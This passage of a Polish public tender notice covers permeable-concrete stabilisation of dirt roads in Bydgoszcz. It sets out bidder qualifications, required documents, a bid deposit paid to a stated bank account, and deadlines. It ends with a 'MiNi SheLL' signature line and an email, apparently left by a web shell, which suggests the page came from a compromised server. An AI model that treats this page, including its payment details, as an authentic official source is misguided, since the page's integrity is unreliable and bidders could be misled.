musi posiadać doświadczenie w ww. zakresie, <br/>z tym że wymóg posiadania doświadczenia dotyczy wykonawców zamierzających bezpośrednio realizować zamówienie.<br/>UWAGA:<br/>W przypadku złożenia przez Wykonawcę ofert na więcej niż jedną cześć zamówienia, Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże się doświadczeniem w wykonaniu jednej roboty budowlanej (a) obejmujących w swym zakresem minimalny poziom zdolności określony powyżej <br/><br/>2)	osób skierowanych przez wykonawcę do realizacji zamówienia <br/>Zamawiający określa jeden minimalny poziom zdolności dla obu części zamówienia.<br/>Wykonawca zobowiązany jest wykazać, że dysponuje osobami, które skieruje<br/>do realizacji zamówienia, gwarantującymi właściwą jakość robót budowlanych, <br/>o kwalifikacjach zawodowych i doświadczeniu zawodowym nie mniejszym niż określono poniżej, tj.:<br/>kierownik budowy<br/>minimalna ilość osób: 1 osoba (dla każdej części zamówienia),<br/>minimalne kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej;<br/>minimalne doświadczenie zawodowe: trzy lata doświadczenia zawodowego w kierowaniu robotami budowlanymi jako kierownik budowy lub kierownik robót drogowych, liczone <br/>od daty uzyskania uprawnień budowlanych;<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 Pzp, ww. warunek udziału w postępowaniu spełniają w następujący sposób: przynajmniej jeden z tych wykonawców musi dysponować osobami o kwalifikacjach, uprawnieniach <br/>i doświadczeniu zawodowym w zakresie określonym powyżej, z tym że wymóg <br/>ten dotyczy wykonawcy, który bezpośrednio wykona roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Wymieniona wyżej osoba odpowiedzialna za kierowanie budową winna posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994 Prawo budowlane (wg stanu prawnego obowiązującego na dzień wszczęcia postępowania). Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej samej specjalności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia Zamawiający żąda oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 Pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109<br/>ust.1 pkt 4 Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Uwaga: Oświadczenie/a składają odpowiednio:<br/>wykonawca / każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia / podmiot trzeci, na którego potencjał<br/>powołuje się wykonawca celem potwierdzenia spełnienia warunków udziałuw postępowaniu (sporządzone wg wzorów Zamawiającego), Wzory oświadczeń stanowią załączniki Nr 5 i 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Podmiotowe środki dowodowe (aktualne na dzień ich złożenia) składane na wezwanie Zamawiającego, zgodnie z art. 274 ust. 1 Pzp - składa wykonawca, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni: <br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat <br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonych wg wzorów Zamawiającego), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. <br/>Wzór wykazu stanowi załącznik Nr 9 do SWZ.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami, to ww. wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>Uwaga: Wykonawca wykazując doświadczenie może uczynić to jedynie w zakresie, w którym sam je nabył. Jeśli doświadczenie zostało nabyte w ramach wykonawców występujących wspólnie (np. konsorcjum) to wykazaniu podlega doświadczenie powstałe jedynie w granicach wykonania robót przez dany podmiot.<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego wg wzoru Zamawiającego). <br/>Wzór wykazu stanowi załącznik Nr 10 do SWZ.<br/>3) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa <br/>w art. 125 ust. 1 Pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109 ust.1 pkt 4 Pzp oraz art. 7 ust. 1 ustawy <br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Uwaga: Oświadczenie/a składają odpowiednio: wykonawca / każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia / podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału <br/>w postępowaniu (sporządzone wg wzorów Zamawiającego).<br/>Wzory oświadczeń stanowią załączniki Nr 11 i 12 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>budowlane, wykonają poszczególni wykonawcy (jeżeli dotyczy). Wzór oświadczenia stanowi załącznik Nr 8 (I-II) do SWZ.<br/>Oświadczenie musi być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w pełnomocnictwie, o którym mowa w pkt XII.8.2) i XII.9.2) SWZ lub dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>2) Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, określające w szczególności:<br/>a) nazwę i wskazanie siedziby podmiotu udostępniającego wykonawcy swoje zasoby,<br/>b) nazwę i wskazanie siedziby wykonawcy, któremu podmiot trzeci udostępnił swoje zasoby,<br/>c) określenie zamówienia publicznego, tj.: Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy batonowymi elementami przepuszczalnymi w 2025r. - Nr sprawy NZ.2531.37.2025<br/>d) zakres dostępnych wykonawcy zasobów innego podmiotu, (tj. informacje, jakie konkretnie zasoby zostaną udostępnione),<br/>e) sposób wykorzystania przez wykonawcę zasobów innego podmiotu przy wykonywaniu zamówienia publicznego, (tj.<br/>informacje, w jaki sposób udostępnione zasoby będą wykorzystywane przy wykonywaniu zamówienia publicznego),<br/>f) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, (tj. informacje, na jakiej podstawie wykonawca<br/>będzie nimi dysponował),<br/>g) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,<br/>h) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących kwalifikacji zawodowych lub doświadczenia<br/>(nie dotyczy sytuacji finansowej lub ekonomicznej), zrealizuje roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>Zobowiązanie innego podmiotu sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym, lub podpisem osobistym<br/>(osoby/osób uprawnionych do działania w imieniu podmiotu trzeciego).<br/>Zobowiązanie wraz z dowodami, że osoba podpisująca zobowiązanie, była uprawniona do działania w imieniu innego<br/>podmiotu, wykonawca dołącza do oferty jako załączniki.<br/>3)Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane w toku<br/>postępowania będą zawierały tajemnicę przedsiębiorstwa, zgodnie z zasadami opisanymi w pkt XII.12-14. SWZ.<br/>4) Pełnomocnictwa ( jeśli dotyczą):<br/>a) pełnomocnictwo/a, jeżeli z właściwego rejestru albo z centralnej ewidencji i informacji o działalności gospodarczej, do których jest bezpłatny i ogólnodostępny dostęp lub z treści złożonych Zamawiającemu oświadczeń lub dokumentów nie<br/>wynika uprawnienie do podpisania oferty oraz względnie do podpisania innych oświadczeń lub dokumentów składanych<br/>wraz z ofertą,<br/>b) pełnomocnictwo/a wynikające z art. 58 ust. 2 Pzp, do reprezentowania wszystkich wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, ewentualnie umowa<br/>o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo – o ile dotyczy, Pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy<br/>cd. w SEKCJI IX - Pozostałe informacje <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia przez wykonawcę wadium w wysokości: <br/>dla Części I: 20.000,00 (słownie: dwadzieścia tysięcy złotych00/100) PLN,<br/>dla części II: 15 000,00 (słownie: piętnaście tysięcy złotych 00/100) PLN.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert. Wadium powinno zabezpieczać złożoną ofertę na cały okres związania ofertą, poczynając od dnia składania ofert.<br/>3.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek <br/>o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp, zostanie odrzucona.<br/>4.	Zgodnie z art. 97 ust. 7 pkt 1-4 Pzp wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego – Zarządu Dróg Miejskich i Komunikacji Publicznej w Bydgoszczy:<br/>Bank Polska Kasa Opieki S.A. (Bank Pekao S.A.) - Nr konta 25 1240 6452 1111 0010 4816 9416<br/>z dopiskiem: „WADIUM – Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r.” – Część ____ (I lub II). Nr sprawy NZ.2531.37.2025.<br/>Zaleca się, by dowód dokonania przelewu został dołączony do oferty.<br/>Za datę wniesienia wadium uznaje się moment wpływu na konto Zamawiającego.<br/>6.	W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, wykonawca przekazuje Zamawiającemu, za pośrednictwem Platformy wraz z Ofertą, oryginał gwarancji lub poręczenia, w postaci elektronicznej opatrzonej podpisem kwalifikowanym.<br/>UWAGA: W celu zachowania wymaganej dla gwarancji/poręczenia formy oryginału, wykonawca przekazuje Zamawiającemu za pośrednictwem Platformy, elektronicznie sporządzony przez gwaranta/poręczyciela dokument (plik) podpisany kwalifikowanym podpisem elektronicznym przez umocowanego przedstawiciela gwaranta/poręczyciela, nie wprowadzając w dokumencie żadnych zmian, w tym nie nanosząc swojego podpisu. Oryginału nie stanowi dokument stanowiący cyfrowe odwzorowanie (scan, kserokopia) otrzymanej gwarancji/poręczenia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 uPzp,<br/>(np. konsorcjum, spółka cywilna), to:<br/>1) wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>2) wszyscy wykonawcy występujący wspólnie muszą upoważnić na piśmie pod rygorem nieważności (art.99 § 2 K.c.)<br/>ustanowionego pełnomocnika, jako przedstawiciela pozostałych, a jego upoważnienie musi być udokumentowane<br/>pełnomocnictwem przez upełnomocnionych przedstawicieli wszystkich pozostałych wykonawców i dołączone do składanej<br/>oferty,<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,<br/>4) z treści formularza ofertowego powinno wynikać, że oferta składana jest w imieniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia,<br/>5) w miejscach dotyczących danych poszczególnych wykonawców (nazwa, adres, NIP, REGON, kategorię<br/>przedsiębiorstwa, do której należy) należy wpisać stosowne dane dotyczące poszczególnych Wykonawców wspólnie<br/>ubiegających się o dofinansowanie.<br/>6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna),<br/>wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie, występującym<br/>jako reprezentant pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian umowy w granicach wyznaczonych przepisami ustawy Pzp, w tym<br/>art. 455 uPzp oraz w zakresie i na warunkach określonych w projektowanych postanowieniach umowy. 1. Projektowane<br/>postanowienia umowy w sprawie zamówienia publicznego określa wzór Umowy z załącznikami - załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1148263</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-12 09:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. sekcji V - Kwalifikacja Wykonawców pkt 5.11<br/>c) pełnomocnictwo/a, jeżeli z właściwego rejestru (do których jest bezpłatny i ogólnodostępny dostęp) lub z treści złożonych<br/>Zamawiającemu oświadczeń lub dokumentów nie wynika uprawnienie do podpisania zobowiązania innego podmiotu oraz<br/>względnie do podpisania innych oświadczeń lub<br/>dokumentów składanych przez ten podmiot (w przypadku gdy wykonawca korzysta ze zdolności innych podmiotów dla<br/>wykazania spełniania warunków udziału w postępowaniu),<br/>I. Podstawy wykluczenia z postępowania - poza uPzp<br/>1. W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego , Zamawiający<br/>wykluczy Wykonawcę z postępowania o udzielenie zamówienia publicznego, który podlega wykluczeniu w okolicznościach<br/>określonych w art. 7 ust. 1 tej ustawy, tj.:<br/>a) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3 ustawy;<br/>b) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu<br/>praniupieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006<br/>i<br/>rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/>ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ustawy;<br/>c) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości , jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014<br/>albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>2. Wykluczenie następuje na okres trwania ww. okoliczności.<br/>3. W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ww. ustawy, Zamawiający odrzuca ofertę takiego<br/>wykonawcy.<br/>4. Osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 ww. ustawy, które w okresie tego wykluczenia<br/>ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego,<br/>podlegają karze pieniężnej, o której mowa w art. 7 ust. 7 ww. ustawy.<br/>5. Przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.<br/>II. Ochrona sygnalistów<br/>Zgodnie z przepisami ustawy z dnia 14 czerwca 2024 r. o ochronie sygnalistów, Zamawiający wdrożył procedurę<br/>dokonywania zgłoszeń naruszeń prawa i podejmowania działań następczych, która opisana została w Zarządzeniu nr<br/>20/2024 Dyrektora ZDMiKP w Bydgoszczy z dnia 18 września 2024r. z załącznikami dostępne w Biuletynie Informacji<br/>Publicznej Zarządu Dróg Miejskich i Komunikacji Publicznej w Bydgoszczyhttps://bip.zdmikp.bydgoszcz.pl/index.php/procedura-zgloszen-w-zdmikp.<br/>III. Zamawiający określa minimalną wartość świadczenia stron na nie mniej niż 70% wartości Umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com